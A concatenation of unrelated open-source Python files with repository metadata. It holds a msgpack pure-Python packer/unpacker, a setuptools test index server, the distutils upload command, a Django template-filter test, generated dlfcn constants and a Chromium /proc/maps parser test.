self._object_pairs_hook = object_pairs_hook
self._ext_hook = ext_hook
if list_hook is not None and not callable(list_hook):
raise TypeError('`list_hook` is not callable')
if object_hook is not None and not callable(object_hook):
raise TypeError('`object_hook` is not callable')
if object_pairs_hook is not None and not callable(object_pairs_hook):
raise TypeError('`object_pairs_hook` is not callable')
if object_hook is not None and object_pairs_hook is not None:
raise TypeError("object_pairs_hook and object_hook are mutually "
"exclusive")
if not callable(ext_hook):
raise TypeError("`ext_hook` is not callable")
def feed(self, next_bytes):
if isinstance(next_bytes, array.array):
next_bytes = next_bytes.tostring()
elif isinstance(next_bytes, bytearray):
next_bytes = bytes(next_bytes)
assert self._fb_feeding
if self._fb_buf_n + len(next_bytes) > self._max_buffer_size:
raise BufferFull
self._fb_buf_n += len(next_bytes)
self._fb_buffers.append(next_bytes)
def _fb_consume(self):
self._fb_buffers = self._fb_buffers[self._fb_buf_i:]
if self._fb_buffers:
self._fb_buffers[0] = self._fb_buffers[0][self._fb_buf_o:]
self._fb_buf_o = 0
self._fb_buf_i = 0
self._fb_buf_n = sum(map(len, self._fb_buffers))
def _fb_got_extradata(self):
if self._fb_buf_i != len(self._fb_buffers):
return True
if self._fb_feeding:
return False
if not self.file_like:
return False
if self.file_like.read(1):
return True
return False
def __iter__(self):
return self
def read_bytes(self, n):
return self._fb_read(n)
def _fb_rollback(self):
self._fb_buf_i = 0
self._fb_buf_o = 0
def _fb_get_extradata(self):
bufs = self._fb_buffers[self._fb_buf_i:]
if bufs:
bufs[0] = bufs[0][self._fb_buf_o:]
return b''.join(bufs)
def _fb_read(self, n, write_bytes=None):
buffs = self._fb_buffers
if (write_bytes is None and self._fb_buf_i < len(buffs) and
self._fb_buf_o + n < len(buffs[self._fb_buf_i])):
self._fb_buf_o += n
return buffs[self._fb_buf_i][self._fb_buf_o - n:self._fb_buf_o]
ret = b''
while len(ret) != n:
if self._fb_buf_i == len(buffs):
if self._fb_feeding:
break
tmp = self.file_like.read(self._read_size)
if not tmp:
break
buffs.append(tmp)
continue
sliced = n - len(ret)
ret += buffs[self._fb_buf_i][self._fb_buf_o:self._fb_buf_o + sliced]
self._fb_buf_o += sliced
if self._fb_buf_o >= len(buffs[self._fb_buf_i]):
self._fb_buf_o = 0
self._fb_buf_i += 1
if len(ret) != n:
self._fb_rollback()
raise OutOfData
if write_bytes is not None:
write_bytes(ret)
return ret
def _read_header(self, execute=EX_CONSTRUCT, write_bytes=None):
typ = TYPE_IMMEDIATE
n = 0
obj = None
c = self._fb_read(1, write_bytes)
b = ord(c)
if b & 0b10000000 == 0:
obj = b
elif b & 0b11100000 == 0b11100000:
obj = struct.unpack("b", c)[0]
elif b & 0b11100000 == 0b10100000:
n = b & 0b00011111
obj = self._fb_read(n, write_bytes)
typ = TYPE_RAW
elif b & 0b11110000 == 0b10010000:
n = b & 0b00001111
typ = TYPE_ARRAY
elif b & 0b11110000 == 0b10000000:
n = b & 0b00001111
typ = TYPE_MAP
elif b == 0xc0:
obj = None
elif b == 0xc2:
obj = False
elif b == 0xc3:
obj = True
elif b == 0xc4:
typ = TYPE_BIN
n = struct.unpack("B", self._fb_read(1, write_bytes))[0]
obj = self._fb_read(n, write_bytes)
elif b == 0xc5:
typ = TYPE_BIN
n = struct.unpack(">H", self._fb_read(2, write_bytes))[0]
obj = self._fb_read(n, write_bytes)
elif b == 0xc6:
typ = TYPE_BIN
n = struct.unpack(">I", self._fb_read(4, write_bytes))[0]
obj = self._fb_read(n, write_bytes)
elif b == 0xc7: # ext 8
typ = TYPE_EXT
L, n = struct.unpack('Bb', self._fb_read(2, write_bytes))
obj = self._fb_read(L, write_bytes)
elif b == 0xc8: # ext 16
typ = TYPE_EXT
L, n = struct.unpack('>Hb', self._fb_read(3, write_bytes))
obj = self._fb_read(L, write_bytes)
elif b == 0xc9: # ext 32
typ = TYPE_EXT
L, n = struct.unpack('>Ib', self._fb_read(5, write_bytes))
obj = self._fb_read(L, write_bytes)
elif b == 0xca:
obj = struct.unpack(">f", self._fb_read(4, write_bytes))[0]
elif b == 0xcb:
obj = struct.unpack(">d", self._fb_read(8, write_bytes))[0]
elif b == 0xcc:
obj = struct.unpack("B", self._fb_read(1, write_bytes))[0]
elif b == 0xcd:
obj = struct.unpack(">H", self._fb_read(2, write_bytes))[0]
elif b == 0xce:
obj = struct.unpack(">I", self._fb_read(4, write_bytes))[0]
elif b == 0xcf:
obj = struct.unpack(">Q", self._fb_read(8, write_bytes))[0]
elif b == 0xd0:
obj = struct.unpack("b", self._fb_read(1, write_bytes))[0]
elif b == 0xd1:
obj = struct.unpack(">h", self._fb_read(2, write_bytes))[0]
elif b == 0xd2:
obj = struct.unpack(">i", self._fb_read(4, write_bytes))[0]
elif b == 0xd3:
obj = struct.unpack(">q", self._fb_read(8, write_bytes))[0]
elif b == 0xd4: # fixext 1
typ = TYPE_EXT
n, obj = struct.unpack('b1s', self._fb_read(2, write_bytes))
elif b == 0xd5: # fixext 2
typ = TYPE_EXT
n, obj = struct.unpack('b2s', self._fb_read(3, write_bytes))
elif b == 0xd6: # fixext 4
typ = TYPE_EXT
n, obj = struct.unpack('b4s', self._fb_read(5, write_bytes))
elif b == 0xd7: # fixext 8
typ = TYPE_EXT
n, obj = struct.unpack('b8s', self._fb_read(9, write_bytes))
elif b == 0xd8: # fixext 16
typ = TYPE_EXT
n, obj = struct.unpack('b16s', self._fb_read(17, write_bytes))
elif b == 0xd9:
typ = TYPE_RAW
n = struct.unpack("B", self._fb_read(1, write_bytes))[0]
obj = self._fb_read(n, write_bytes)
elif b == 0xda:
typ = TYPE_RAW
n = struct.unpack(">H", self._fb_read(2, write_bytes))[0]
obj = self._fb_read(n, write_bytes)
elif b == 0xdb:
typ = TYPE_RAW
n = struct.unpack(">I", self._fb_read(4, write_bytes))[0]
obj = self._fb_read(n, write_bytes)
elif b == 0xdc:
n = struct.unpack(">H", self._fb_read(2, write_bytes))[0]
typ = TYPE_ARRAY
elif b == 0xdd:
n = struct.unpack(">I", self._fb_read(4, write_bytes))[0]
typ = TYPE_ARRAY
elif b == 0xde:
n = struct.unpack(">H", self._fb_read(2, write_bytes))[0]
typ = TYPE_MAP
elif b == 0xdf:
n = struct.unpack(">I", self._fb_read(4, write_bytes))[0]
typ = TYPE_MAP
else:
raise UnpackValueError("Unknown header: 0x%x" % b)
return typ, n, obj
def _fb_unpack(self, execute=EX_CONSTRUCT, write_bytes=None):
typ, n, obj = self._read_header(execute, write_bytes)
if execute == EX_READ_ARRAY_HEADER:
if typ != TYPE_ARRAY:
raise UnpackValueError("Expected array")
return n
if execute == EX_READ_MAP_HEADER:
if typ != TYPE_MAP:
raise UnpackValueError("Expected map")
return n
# TODO should we eliminate the recursion?
if typ == TYPE_ARRAY:
if execute == EX_SKIP:
for i in xrange(n):
# TODO check whether we need to call `list_hook`
self._fb_unpack(EX_SKIP, write_bytes)
return
ret = newlist_hint(n)
for i in xrange(n):
ret.append(self._fb_unpack(EX_CONSTRUCT, write_bytes))
if self._list_hook is not None:
ret = self._list_hook(ret)
# TODO is the interaction between `list_hook` and `use_list` ok?
return ret if self._use_list else tuple(ret)
if typ == TYPE_MAP:
if execute == EX_SKIP:
for i in xrange(n):
# TODO check whether we need to call hooks
self._fb_unpack(EX_SKIP, write_bytes)
self._fb_unpack(EX_SKIP, write_bytes)
return
if self._object_pairs_hook is not None:
ret = self._object_pairs_hook(
(self._fb_unpack(EX_CONSTRUCT, write_bytes),
self._fb_unpack(EX_CONSTRUCT, write_bytes))
for _ in xrange(n))
else:
ret = {}
for _ in xrange(n):
key = self._fb_unpack(EX_CONSTRUCT, write_bytes)
ret[key] = self._fb_unpack(EX_CONSTRUCT, write_bytes)
if self._object_hook is not None:
ret = self._object_hook(ret)
return ret
if execute == EX_SKIP:
return
if typ == TYPE_RAW:
if self._encoding is not None:
obj = obj.decode(self._encoding, self._unicode_errors)
return obj
if typ == TYPE_EXT:
return self._ext_hook(n, obj)
if typ == TYPE_BIN:
return obj
assert typ == TYPE_IMMEDIATE
return obj
def next(self):
try:
ret = self._fb_unpack(EX_CONSTRUCT, None)
self._fb_consume()
return ret
except OutOfData:
raise StopIteration
__next__ = next
def skip(self, write_bytes=None):
self._fb_unpack(EX_SKIP, write_bytes)
self._fb_consume()
def unpack(self, write_bytes=None):
ret = self._fb_unpack(EX_CONSTRUCT, write_bytes)
self._fb_consume()
return ret
def read_array_header(self, write_bytes=None):
ret = self._fb_unpack(EX_READ_ARRAY_HEADER, write_bytes)
self._fb_consume()
return ret
def read_map_header(self, write_bytes=None):
ret = self._fb_unpack(EX_READ_MAP_HEADER, write_bytes)
self._fb_consume()
return ret
class Packer(object):
"""
MessagePack Packer
usage:
packer = Packer()
astream.write(packer.pack(a))
astream.write(packer.pack(b))
Packer's constructor has some keyword arguments:
:param callable default:
Convert user type to builtin type that Packer supports.
See also simplejson's document.
:param str encoding:
Convert unicode to bytes with this encoding. (default: 'utf-8')
:param str unicode_errors:
Error handler for encoding unicode. (default: 'strict')
:param bool use_single_float:
Use single precision float type for float. (default: False)
:param bool autoreset:
Reset buffer after each pack and return it's content as `bytes`. (default: True).
If set this to false, use `bytes()` to get content and `.reset()` to clear buffer.
:param bool use_bin_type:
Use bin type introduced in msgpack spec 2.0 for bytes.
It also enable str8 type for unicode.
"""
def __init__(self, default=None, encoding='utf-8', unicode_errors='strict',
use_single_float=False, autoreset=True, use_bin_type=False):
self._use_float = use_single_float
self._autoreset = autoreset
self._use_bin_type = use_bin_type
self._encoding = encoding
self._unicode_errors = unicode_errors
self._buffer = StringIO()
if default is not None:
if not callable(default):
raise TypeError("default must be callable")
self._default = default
def _pack(self, obj, nest_limit=DEFAULT_RECURSE_LIMIT, isinstance=isinstance):
default_used = False
while True:
if nest_limit < 0:
raise PackValueError("recursion limit exceeded")
if obj is None:
return self._buffer.write(b"\xc0")
if isinstance(obj, bool):
if obj:
return self._buffer.write(b"\xc3")
return self._buffer.write(b"\xc2")
if isinstance(obj, int_types):
if 0 <= obj < 0x80:
return self._buffer.write(struct.pack("B", obj))
if -0x20 <= obj < 0:
return self._buffer.write(struct.pack("b", obj))
if 0x80 <= obj <= 0xff:
return self._buffer.write(struct.pack("BB", 0xcc, obj))
if -0x80 <= obj < 0:
return self._buffer.write(struct.pack(">Bb", 0xd0, obj))
if 0xff < obj <= 0xffff:
return self._buffer.write(struct.pack(">BH", 0xcd, obj))
if -0x8000 <= obj < -0x80:
return self._buffer.write(struct.pack(">Bh", 0xd1, obj))
if 0xffff < obj <= 0xffffffff:
return self._buffer.write(struct.pack(">BI", 0xce, obj))
if -0x80000000 <= obj < -0x8000:
return self._buffer.write(struct.pack(">Bi", 0xd2, obj))
if 0xffffffff < obj <= 0xffffffffffffffff:
return self._buffer.write(struct.pack(">BQ", 0xcf, obj))
if -0x8000000000000000 <= obj < -0x80000000:
return self._buffer.write(struct.pack(">Bq", 0xd3, obj))
raise PackValueError("Integer value out of range")
if self._use_bin_type and isinstance(obj, bytes):
n = len(obj)
if n <= 0xff:
self._buffer.write(struct.pack('>BB', 0xc4, n))
elif n <= 0xffff:
self._buffer.write(struct.pack(">BH", 0xc5, n))
elif n <= 0xffffffff:
self._buffer.write(struct.pack(">BI", 0xc6, n))
else:
raise PackValueError("Bytes is too large")
return self._buffer.write(obj)
if isinstance(obj, (Unicode, bytes)):
if isinstance(obj, Unicode):
if self._encoding is None:
raise TypeError(
"Can't encode unicode string: "
"no encoding is specified")
obj = obj.encode(self._encoding, self._unicode_errors)
n = len(obj)
if n <= 0x1f:
self._buffer.write(struct.pack('B', 0xa0 + n))
elif self._use_bin_type and n <= 0xff:
self._buffer.write(struct.pack('>BB', 0xd9, n))
elif n <= 0xffff:
self._buffer.write(struct.pack(">BH", 0xda, n))
elif n <= 0xffffffff:
self._buffer.write(struct.pack(">BI", 0xdb, n))
else:
raise PackValueError("String is too large")
return self._buffer.write(obj)
if isinstance(obj, float):
if self._use_float:
return self._buffer.write(struct.pack(">Bf", 0xca, obj))
return self._buffer.write(struct.pack(">Bd", 0xcb, obj))
if isinstance(obj, ExtType):
code = obj.code
data = obj.data
assert isinstance(code, int)
assert isinstance(data, bytes)
L = len(data)
if L == 1:
self._buffer.write(b'\xd4')
elif L == 2:
self._buffer.write(b'\xd5')
elif L == 4:
self._buffer.write(b'\xd6')
elif L == 8:
self._buffer.write(b'\xd7')
elif L == 16:
self._buffer.write(b'\xd8')
elif L <= 0xff:
self._buffer.write(struct.pack(">BB", 0xc7, L))
elif L <= 0xffff:
self._buffer.write(struct.pack(">BH", 0xc8, L))
else:
self._buffer.write(struct.pack(">BI", 0xc9, L))
self._buffer.write(struct.pack("b", code))
self._buffer.write(data)
return
if isinstance(obj, (list, tuple)):
n = len(obj)
self._fb_pack_array_header(n)
for i in xrange(n):
self._pack(obj[i], nest_limit - 1)
return
if isinstance(obj, dict):
return self._fb_pack_map_pairs(len(obj), dict_iteritems(obj),
nest_limit - 1)
if not default_used and self._default is not None:
obj = self._default(obj)
default_used = 1
continue
raise TypeError("Cannot serialize %r" % obj)
def pack(self, obj):
self._pack(obj)
ret = self._buffer.getvalue()
if self._autoreset:
self._buffer = StringIO()
elif USING_STRINGBUILDER:
self._buffer = StringIO(ret)
return ret
def pack_map_pairs(self, pairs):
self._fb_pack_map_pairs(len(pairs), pairs)
ret = self._buffer.getvalue()
if self._autoreset:
self._buffer = StringIO()
elif USING_STRINGBUILDER:
self._buffer = StringIO(ret)
return ret
def pack_array_header(self, n):
if n >= 2**32:
raise ValueError
self._fb_pack_array_header(n)
ret = self._buffer.getvalue()
if self._autoreset:
self._buffer = StringIO()
elif USING_STRINGBUILDER:
self._buffer = StringIO(ret)
return ret
def pack_map_header(self, n):
if n >= 2**32:
raise ValueError
self._fb_pack_map_header(n)
ret = self._buffer.getvalue()
if self._autoreset:
self._buffer = StringIO()
elif USING_STRINGBUILDER:
self._buffer = StringIO(ret)
return ret
def pack_ext_type(self, typecode, data):
if not isinstance(typecode, int):
raise TypeError("typecode must have int type.")
if not 0 <= typecode <= 127:
raise ValueError("typecode should be 0-127")
if not isinstance(data, bytes):
raise TypeError("data must have bytes type")
L = len(data)
if L > 0xffffffff:
raise ValueError("Too large data")
if L == 1:
self._buffer.write(b'\xd4')
elif L == 2:
self._buffer.write(b'\xd5')
elif L == 4:
self._buffer.write(b'\xd6')
elif L == 8:
self._buffer.write(b'\xd7')
elif L == 16:
self._buffer.write(b'\xd8')
elif L <= 0xff:
self._buffer.write(b'\xc7' + struct.pack('B', L))
elif L <= 0xffff:
self._buffer.write(b'\xc8' + struct.pack('>H', L))
else:
self._buffer.write(b'\xc9' + struct.pack('>I', L))
self._buffer.write(struct.pack('B', typecode))
self._buffer.write(data)
def _fb_pack_array_header(self, n):
if n <= 0x0f:
return self._buffer.write(struct.pack('B', 0x90 + n))
if n <= 0xffff:
return self._buffer.write(struct.pack(">BH", 0xdc, n))
if n <= 0xffffffff:
return self._buffer.write(struct.pack(">BI", 0xdd, n))
raise PackValueError("Array is too large")
def _fb_pack_map_header(self, n):
if n <= 0x0f:
return self._buffer.write(struct.pack('B', 0x80 + n))
if n <= 0xffff:
return self._buffer.write(struct.pack(">BH", 0xde, n))
if n <= 0xffffffff:
return self._buffer.write(struct.pack(">BI", 0xdf, n))
raise PackValueError("Dict is too large")
def _fb_pack_map_pairs(self, n, pairs, nest_limit=DEFAULT_RECURSE_LIMIT):
self._fb_pack_map_header(n)
for (k, v) in pairs:
self._pack(k, nest_limit - 1)
self._pack(v, nest_limit - 1)
def bytes(self):
return self._buffer.getvalue()
def reset(self):
self._buffer = StringIO()
| mit | 335,946,032,770,226,560 | 35.978992 | 90 | 0.524069 | false |
djabber/Dashboard | bottle/dash/local/lib/python2.7/site-packages/setuptools/tests/server.py | 452 | 2651 | """Basic http server for tests to simulate PyPI or custom indexes
"""
import sys
import time
import threading
from setuptools.compat import BaseHTTPRequestHandler
from setuptools.compat import (urllib2, URLError, HTTPServer,
SimpleHTTPRequestHandler)
class IndexServer(HTTPServer):
"""Basic single-threaded http server simulating a package index
You can use this server in unittest like this::
s = IndexServer()
s.start()
index_url = s.base_url() + 'mytestindex'
# do some test requests to the index
# The index files should be located in setuptools/tests/indexes
s.stop()
"""
def __init__(self, server_address=('', 0),
RequestHandlerClass=SimpleHTTPRequestHandler):
HTTPServer.__init__(self, server_address, RequestHandlerClass)
self._run = True
def serve(self):
while self._run:
self.handle_request()
def start(self):
self.thread = threading.Thread(target=self.serve)
self.thread.start()
def stop(self):
"Stop the server"
# Let the server finish the last request and wait for a new one.
time.sleep(0.1)
# self.shutdown is not supported on python < 2.6, so just
# set _run to false, and make a request, causing it to
# terminate.
self._run = False
url = 'http://127.0.0.1:%(server_port)s/' % vars(self)
try:
if sys.version_info >= (2, 6):
urllib2.urlopen(url, timeout=5)
else:
urllib2.urlopen(url)
except URLError:
# ignore any errors; all that's important is the request
pass
self.thread.join()
self.socket.close()
def base_url(self):
port = self.server_port
return 'http://127.0.0.1:%s/setuptools/tests/indexes/' % port
class RequestRecorder(BaseHTTPRequestHandler):
def do_GET(self):
requests = vars(self.server).setdefault('requests', [])
requests.append(self)
self.send_response(200, 'OK')
class MockServer(HTTPServer, threading.Thread):
"""
A simple HTTP Server that records the requests made to it.
"""
def __init__(self, server_address=('', 0),
RequestHandlerClass=RequestRecorder):
HTTPServer.__init__(self, server_address, RequestHandlerClass)
threading.Thread.__init__(self)
self.setDaemon(True)
self.requests = []
def run(self):
self.serve_forever()
def url(self):
return 'http://localhost:%(server_port)s/' % vars(self)
url = property(url)
| mit | -8,197,405,527,002,301,000 | 31.329268 | 72 | 0.607695 | false |
dexterx17/nodoSocket | clients/Python-2.7.6/Lib/distutils/command/upload.py | 176 | 7002 | """distutils.command.upload
Implements the Distutils 'upload' subcommand (upload package to PyPI)."""
import os
import socket
import platform
from urllib2 import urlopen, Request, HTTPError
from base64 import standard_b64encode
import urlparse
import cStringIO as StringIO
from hashlib import md5
from distutils.errors import DistutilsOptionError
from distutils.core import PyPIRCCommand
from distutils.spawn import spawn
from distutils import log
class upload(PyPIRCCommand):
description = "upload binary package to PyPI"
user_options = PyPIRCCommand.user_options + [
('sign', 's',
'sign files to upload using gpg'),
('identity=', 'i', 'GPG identity used to sign files'),
]
boolean_options = PyPIRCCommand.boolean_options + ['sign']
def initialize_options(self):
PyPIRCCommand.initialize_options(self)
self.username = ''
self.password = ''
self.show_response = 0
self.sign = False
self.identity = None
def finalize_options(self):
PyPIRCCommand.finalize_options(self)
if self.identity and not self.sign:
raise DistutilsOptionError(
"Must use --sign for --identity to have meaning"
)
config = self._read_pypirc()
if config != {}:
self.username = config['username']
self.password = config['password']
self.repository = config['repository']
self.realm = config['realm']
# getting the password from the distribution
# if previously set by the register command
if not self.password and self.distribution.password:
self.password = self.distribution.password
def run(self):
if not self.distribution.dist_files:
raise DistutilsOptionError("No dist file created in earlier command")
for command, pyversion, filename in self.distribution.dist_files:
self.upload_file(command, pyversion, filename)
def upload_file(self, command, pyversion, filename):
# Makes sure the repository URL is compliant
schema, netloc, url, params, query, fragments = \
urlparse.urlparse(self.repository)
if params or query or fragments:
raise AssertionError("Incompatible url %s" % self.repository)
if schema not in ('http', 'https'):
raise AssertionError("unsupported schema " + schema)
# Sign if requested
if self.sign:
gpg_args = ["gpg", "--detach-sign", "-a", filename]
if self.identity:
gpg_args[2:2] = ["--local-user", self.identity]
spawn(gpg_args,
dry_run=self.dry_run)
# Fill in the data - send all the meta-data in case we need to
# register a new release
f = open(filename,'rb')
try:
content = f.read()
finally:
f.close()
meta = self.distribution.metadata
data = {
# action
':action': 'file_upload',
'protcol_version': '1',
# identify release
'name': meta.get_name(),
'version': meta.get_version(),
# file content
'content': (os.path.basename(filename),content),
'filetype': command,
'pyversion': pyversion,
'md5_digest': md5(content).hexdigest(),
# additional meta-data
'metadata_version' : '1.0',
'summary': meta.get_description(),
'home_page': meta.get_url(),
'author': meta.get_contact(),
'author_email': meta.get_contact_email(),
'license': meta.get_licence(),
'description': meta.get_long_description(),
'keywords': meta.get_keywords(),
'platform': meta.get_platforms(),
'classifiers': meta.get_classifiers(),
'download_url': meta.get_download_url(),
# PEP 314
'provides': meta.get_provides(),
'requires': meta.get_requires(),
'obsoletes': meta.get_obsoletes(),
}
comment = ''
if command == 'bdist_rpm':
dist, version, id = platform.dist()
if dist:
comment = 'built for %s %s' % (dist, version)
elif command == 'bdist_dumb':
comment = 'built for %s' % platform.platform(terse=1)
data['comment'] = comment
if self.sign:
data['gpg_signature'] = (os.path.basename(filename) + ".asc",
open(filename+".asc").read())
# set up the authentication
auth = "Basic " + standard_b64encode(self.username + ":" +
self.password)
# Build up the MIME payload for the POST data
boundary = '--------------GHSKFJDLGDS7543FJKLFHRE75642756743254'
sep_boundary = '\n--' + boundary
end_boundary = sep_boundary + '--'
body = StringIO.StringIO()
for key, value in data.items():
# handle multiple entries for the same name
if not isinstance(value, list):
value = [value]
for value in value:
if isinstance(value, tuple):
fn = ';filename="%s"' % value[0]
value = value[1]
else:
fn = ""
body.write(sep_boundary)
body.write('\nContent-Disposition: form-data; name="%s"'%key)
body.write(fn)
body.write("\n\n")
body.write(value)
if value and value[-1] == '\r':
body.write('\n') # write an extra newline (lurve Macs)
body.write(end_boundary)
body.write("\n")
body = body.getvalue()
self.announce("Submitting %s to %s" % (filename, self.repository), log.INFO)
# build the Request
headers = {'Content-type':
'multipart/form-data; boundary=%s' % boundary,
'Content-length': str(len(body)),
'Authorization': auth}
request = Request(self.repository, data=body,
headers=headers)
# send the data
try:
result = urlopen(request)
status = result.getcode()
reason = result.msg
if self.show_response:
msg = '\n'.join(('-' * 75, r.read(), '-' * 75))
self.announce(msg, log.INFO)
except socket.error, e:
self.announce(str(e), log.ERROR)
return
except HTTPError, e:
status = e.code
reason = e.msg
if status == 200:
self.announce('Server response (%s): %s' % (status, reason),
log.INFO)
else:
self.announce('Upload failed (%s): %s' % (status, reason),
log.ERROR)
| mit | -8,618,214,291,133,476,000 | 35.092784 | 84 | 0.537846 | false |
baylee/django | tests/template_tests/filter_tests/test_dictsortreversed.py | 181 | 1686 | from django.template.defaultfilters import dictsortreversed
from django.test import SimpleTestCase
class FunctionTests(SimpleTestCase):
def test_sort(self):
sorted_dicts = dictsortreversed(
[{'age': 23, 'name': 'Barbara-Ann'},
{'age': 63, 'name': 'Ra Ra Rasputin'},
{'name': 'Jonny B Goode', 'age': 18}],
'age',
)
self.assertEqual(
[sorted(dict.items()) for dict in sorted_dicts],
[[('age', 63), ('name', 'Ra Ra Rasputin')],
[('age', 23), ('name', 'Barbara-Ann')],
[('age', 18), ('name', 'Jonny B Goode')]],
)
def test_sort_list_of_tuples(self):
data = [('a', '42'), ('c', 'string'), ('b', 'foo')]
expected = [('c', 'string'), ('b', 'foo'), ('a', '42')]
self.assertEqual(dictsortreversed(data, 0), expected)
def test_sort_list_of_tuple_like_dicts(self):
data = [
{'0': 'a', '1': '42'},
{'0': 'c', '1': 'string'},
{'0': 'b', '1': 'foo'},
]
expected = [
{'0': 'c', '1': 'string'},
{'0': 'b', '1': 'foo'},
{'0': 'a', '1': '42'},
]
self.assertEqual(dictsortreversed(data, '0'), expected)
def test_invalid_values(self):
"""
If dictsortreversed is passed something other than a list of
dictionaries, fail silently.
"""
self.assertEqual(dictsortreversed([1, 2, 3], 'age'), '')
self.assertEqual(dictsortreversed('Hello!', 'age'), '')
self.assertEqual(dictsortreversed({'a': 1}, 'age'), '')
self.assertEqual(dictsortreversed(1, 'age'), '')
| bsd-3-clause | -4,918,233,202,347,198,000 | 34.125 | 68 | 0.488138 | false |
p4datasystems/CarnotKE | jyhton/lib-python/2.7/plat-linux2/DLFCN.py | 158 | 1628 | # Generated by h2py from /usr/include/dlfcn.h
_DLFCN_H = 1
# Included from features.h
_FEATURES_H = 1
__USE_ANSI = 1
__FAVOR_BSD = 1
_ISOC99_SOURCE = 1
_POSIX_SOURCE = 1
_POSIX_C_SOURCE = 199506L
_XOPEN_SOURCE = 600
_XOPEN_SOURCE_EXTENDED = 1
_LARGEFILE64_SOURCE = 1
_BSD_SOURCE = 1
_SVID_SOURCE = 1
_BSD_SOURCE = 1
_SVID_SOURCE = 1
__USE_ISOC99 = 1
_POSIX_SOURCE = 1
_POSIX_C_SOURCE = 2
_POSIX_C_SOURCE = 199506L
__USE_POSIX = 1
__USE_POSIX2 = 1
__USE_POSIX199309 = 1
__USE_POSIX199506 = 1
__USE_XOPEN = 1
__USE_XOPEN_EXTENDED = 1
__USE_UNIX98 = 1
_LARGEFILE_SOURCE = 1
__USE_XOPEN2K = 1
__USE_ISOC99 = 1
__USE_XOPEN_EXTENDED = 1
__USE_LARGEFILE = 1
__USE_LARGEFILE64 = 1
__USE_FILE_OFFSET64 = 1
__USE_MISC = 1
__USE_BSD = 1
__USE_SVID = 1
__USE_GNU = 1
__USE_REENTRANT = 1
__STDC_IEC_559__ = 1
__STDC_IEC_559_COMPLEX__ = 1
__STDC_ISO_10646__ = 200009L
__GNU_LIBRARY__ = 6
__GLIBC__ = 2
__GLIBC_MINOR__ = 2
# Included from sys/cdefs.h
_SYS_CDEFS_H = 1
def __PMT(args): return args
def __P(args): return args
def __PMT(args): return args
def __STRING(x): return #x
__flexarr = []
__flexarr = [0]
__flexarr = []
__flexarr = [1]
def __ASMNAME(cname): return __ASMNAME2 (__USER_LABEL_PREFIX__, cname)
def __attribute__(xyz): return
def __attribute_format_arg__(x): return __attribute__ ((__format_arg__ (x)))
def __attribute_format_arg__(x): return
__USE_LARGEFILE = 1
__USE_LARGEFILE64 = 1
__USE_EXTERN_INLINES = 1
# Included from gnu/stubs.h
# Included from bits/dlfcn.h
RTLD_LAZY = 0x00001
RTLD_NOW = 0x00002
RTLD_BINDING_MASK = 0x3
RTLD_NOLOAD = 0x00004
RTLD_GLOBAL = 0x00100
RTLD_LOCAL = 0
RTLD_NODELETE = 0x01000
| apache-2.0 | 2,696,901,573,539,431,400 | 18.614458 | 76 | 0.652948 | false |
zcbenz/cefode-chromium | tools/find_runtime_symbols/tests/proc_maps_test.py | 38 | 4611 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import cStringIO
import logging
import os
import sys
import unittest
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, ROOT_DIR)
from proc_maps import ProcMaps
class ProcMapsTest(unittest.TestCase):
_TEST_PROCMAPS = '\n'.join([
'00000000-00001000 r--p 00000000 fc:00 0',
'0080b000-0080c000 r-xp 0020b000 fc:00 2231329'
' /usr/bin/some',
'0080c000-0080f000 ---p 0020c000 fc:00 2231329'
' /usr/bin/some',
'0100a000-0100c000 r-xp 0120a000 fc:00 22381'
' /usr/bin/chrome',
'0100c000-0100f000 ---p 0120c000 fc:00 22381'
' /usr/bin/chrome',
'0237d000-02a9b000 rw-p 00000000 00:00 0'
' [heap]',
'7fb920e6d000-7fb920e85000 r-xp 00000000 fc:00 263482'
' /lib/x86_64-linux-gnu/libpthread-2.15.so',
'7fb920e85000-7fb921084000 ---p 00018000 fc:00 263482'
' /lib/x86_64-linux-gnu/libpthread-2.15.so',
'7fb9225f4000-7fb922654000 rw-s 00000000 00:04 19660808'
' /SYSV00000000 (deleted)',
'ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0'
' [vsyscall]',
])
_EXPECTED = [
(0x0, 0x1000, 'r', '-', '-', 'p', 0x0, 'fc', '00', 0, ''),
(0x80b000, 0x80c000, 'r', '-', 'x', 'p', 0x20b000,
'fc', '00', 2231329, '/usr/bin/some'),
(0x80c000, 0x80f000, '-', '-', '-', 'p', 0x20c000,
'fc', '00', 2231329, '/usr/bin/some'),
(0x100a000, 0x100c000, 'r', '-', 'x', 'p', 0x120a000,
'fc', '00', 22381, '/usr/bin/chrome'),
(0x100c000, 0x100f000, '-', '-', '-', 'p', 0x120c000,
'fc', '00', 22381, '/usr/bin/chrome'),
(0x237d000, 0x2a9b000, 'r', 'w', '-', 'p', 0x0,
'00', '00', 0, '[heap]'),
(0x7fb920e6d000, 0x7fb920e85000, 'r', '-', 'x', 'p', 0x0,
'fc', '00', 263482, '/lib/x86_64-linux-gnu/libpthread-2.15.so'),
(0x7fb920e85000, 0x7fb921084000, '-', '-', '-', 'p', 0x18000,
'fc', '00', 263482, '/lib/x86_64-linux-gnu/libpthread-2.15.so'),
(0x7fb9225f4000, 0x7fb922654000, 'r', 'w', '-', 's', 0x0,
'00', '04', 19660808, '/SYSV00000000 (deleted)'),
(0xffffffffff600000, 0xffffffffff601000, 'r', '-', 'x', 'p', 0x0,
'00', '00', 0, '[vsyscall]'),
]
@staticmethod
def _expected_as_dict(index):
return {
'begin': ProcMapsTest._EXPECTED[index][0],
'end': ProcMapsTest._EXPECTED[index][1],
'readable': ProcMapsTest._EXPECTED[index][2],
'writable': ProcMapsTest._EXPECTED[index][3],
'executable': ProcMapsTest._EXPECTED[index][4],
'private': ProcMapsTest._EXPECTED[index][5],
'offset': ProcMapsTest._EXPECTED[index][6],
'major': ProcMapsTest._EXPECTED[index][7],
'minor': ProcMapsTest._EXPECTED[index][8],
'inode': ProcMapsTest._EXPECTED[index][9],
'name': ProcMapsTest._EXPECTED[index][10],
}
def test_load(self):
maps = ProcMaps.load(cStringIO.StringIO(self._TEST_PROCMAPS))
for index, entry in enumerate(maps):
self.assertEqual(entry.as_dict(), self._expected_as_dict(index))
def test_constants(self):
maps = ProcMaps.load(cStringIO.StringIO(self._TEST_PROCMAPS))
selected = [4, 7]
for index, entry in enumerate(maps.iter(ProcMaps.constants)):
self.assertEqual(entry.as_dict(),
self._expected_as_dict(selected[index]))
